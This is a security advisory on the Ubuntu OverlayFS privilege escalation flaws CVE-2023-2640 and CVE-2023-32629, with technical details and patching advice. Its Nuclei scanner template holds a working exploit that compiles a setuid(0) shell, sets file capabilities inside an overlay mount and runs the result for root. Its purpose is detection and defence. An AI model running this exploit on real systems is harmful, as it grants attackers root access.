GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
GameOver(lay) is the name given to two vulnerabilities in the Ubuntu kernel, CVE-2023-2640 and CVE-2023-32629, each rated high severity with a CVSS score of 7.8. Both live in Ubuntu's OverlayFS module and are estimated to affect around 40% of Ubuntu users. A local, unprivileged attacker can use either one to escalate to root on an unpatched system.
Technical Details
CVE-2023-2640: This vulnerability is specific to Ubuntu kernels that carry both the upstream commit c914c0e27eb0 and the Ubuntu-only patch UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs. On such a kernel an unprivileged user can set privileged extended attributes on files inside an OverlayFS mount, and on copy-up those attributes are written to the upper files without the security checks that would normally apply. The result is that an unprivileged user ends up with attributes (and the privileges they confer) that they were never allowed to set.
CVE-2023-32629: A local privilege escalation in Ubuntu's OverlayFS. The ovl_copy_up_meta_inode_data function skips permission checks when it calls ovl_do_setxattr. An attacker creates an executable whose file capabilities are scoped to their own user namespace (where they are root), then triggers a copy-up so the kernel writes the file, capability included, into the upper directory without that scoping. Any user who then executes the copied-up file from the host namespace holds the capability for real; with cap_setuid that is a single setuid(0) call away from a root shell.
Nuclei Template
```yaml
id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local

self-contained: true
code:
  # Baseline: the template must be running as an unprivileged user,
  # otherwise "(root)" in the second step proves nothing.
  - engine:
      - sh
      - bash
    source: |
      id

  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      # printf '%b' instead of echo: dash's echo expands \n but bash's builtin does not,
      # and a one-line test.c does not compile.
      printf '%b' '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      # Build the overlay and trigger the copy-up inside an unprivileged user namespace,
      # but run the copied-up binary outside it: inside `unshare -r` the caller already
      # is uid 0, so `id` there prints "(root)" on every kernel, patched or not.
      # The piped `id` is executed by the `/bin/bash -p` that test spawns after setuid(0).
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test" && echo id | u/test

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and
```
Timeline
The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure.
Remediation
Apply the kernel updates provided by Ubuntu and reboot into the patched kernel; the fix is in the kernel, so updating packages without a reboot leaves the running system exposed. Exploitation requires creating a user namespace and an OverlayFS mount, so the attacker must already be executing code as a local user: there is no remote vector on its own, but any foothold (a web shell, a compromised service account, a container or CI job running as an unprivileged user on an affected host) is enough to reach root. Where patching has to wait, restricting unprivileged user namespaces removes the precondition the exploit depends on.